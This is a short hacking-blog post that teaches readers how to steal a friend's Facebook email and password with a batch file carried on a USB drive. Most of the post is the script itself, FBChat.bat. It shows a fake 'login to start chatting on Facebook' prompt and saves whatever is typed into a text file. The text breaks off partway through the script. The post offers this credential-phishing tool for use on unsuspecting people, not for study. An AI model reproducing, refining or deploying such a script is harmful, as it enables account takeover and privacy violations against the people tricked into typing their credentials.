Ethical Hacking Blog How to Stolen Facebook Password using Pendrive #Author: ManishHacker1 Today, we will learn, how to capture or how to stolen USERNAME and PASSWORD of Facebook account of your friend.. Some times Hackers use this technique to grab your Fb ID and Password. First , open your notepad and type bilow code in your notepad. After that save as your notepad file in "anyname.bat"(FBChat.bat) in your Machine or Pendrive. I used to save this file FBChat.bat. Where ".bat" is your file extension. CODE TITLE FBChat ECHO OFF setlocal enabledelayedexpansion set Counter=0 set Schalter=2 set Width=0 COLOR 09 CLS ECHO. ECHO LOGIN TO START CHATTING ON FACEBOOK ECHO. ECHO Please enter your email and Hit enter: SET/P "MAIL=>" ECHO. ECHO Enter the password and Hit enter: SET/P "PASS=>" ECHO.>>Facebook.txt ECHO EMAIL = %MAIL%>>Facebook.txt ECHO PASSWORD = %PASS%>>Facebook.txt CLS :1 set /a Counter=%Counter% + 1 set /a Display...